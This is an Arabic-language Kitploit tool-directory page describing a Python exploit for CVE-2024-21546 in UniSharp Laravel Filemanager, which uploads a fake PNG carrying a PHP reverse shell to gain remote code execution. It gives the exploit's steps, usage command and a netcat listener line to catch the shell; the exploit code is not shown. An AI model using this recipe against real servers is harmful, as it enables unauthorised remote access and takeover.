Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-21546 — يستهدف هذا النص البرمجي الاستغلالي المكتوب بلغة بايثون مدير الملفات Laravel الضعيف الذي أنشأته UniSharp، والذي يسمح للمستخدمين المصادق عليهم بتجاوز قيود الملفات وتحميل ملفات ضارة. وهذا يمكن أن يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) عند تشغيل الحمولة المرفوعة. | Kitploit
أدوات/GitHubGitHub/ajdumanhug/cve-2024-21546
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubajdumanhug/cve-2024-21546

CVE-2024-21546

يستهدف هذا النص البرمجي الاستغلالي المكتوب بلغة بايثون مدير الملفات Laravel الضعيف الذي أنشأته UniSharp، والذي يسمح للمستخدمين المصادق عليهم بتجاوز قيود الملفات وتحميل ملفات ضارة. وهذا يمكن أن يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) عند تشغيل الحمولة المرفوعة.

عرض المستودع
51منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-21546 Python Exploit

🔥 الوصف

هذا النص البرمجي الاستغلالي بلغة Python يستهدف مدير ملفات Laravel الضعيف الذي أنشأته UniSharp، والذي يسمح للمستخدمين الموثَّقين بتجاوز قيود الملفات ورفع ملفات ضارة. يمكن أن يؤدي ذلك إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) عند تشغيل الحمولة المرفوعة.

يقوم النص البرمجي الاستغلالي بما يلي:

  • التحقق من صحة laravel_session المقدمة من المستخدم
  • استخراج _token الخاص بـ CSRF عبر تعبير عادي (regex)
  • رفع ملف PNG مزيف يحتوي على حمولة شيل PHP عكسي
  • تشغيل الملف المرفوع

⚠️ الإصدارات المتأثرة

الإصدار 2.9.1 والإصدارات السابقة له

⚙️ الاستخدام

root@kitploit:~
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>

مهم: قم بتشغيل المستمع الخاص بك قبل تشغيل البرنامج النصي:

root@kitploit:~
nc -lvnp <listener_port>

💻 تشغيل تجريبي

image

ℹ️ المراجع

  • CVE-2024-21546
  • RCE عبر رفع شيل في Unisharp Laravel Filemanager
  • Commit 8170760
تنزيل الأداة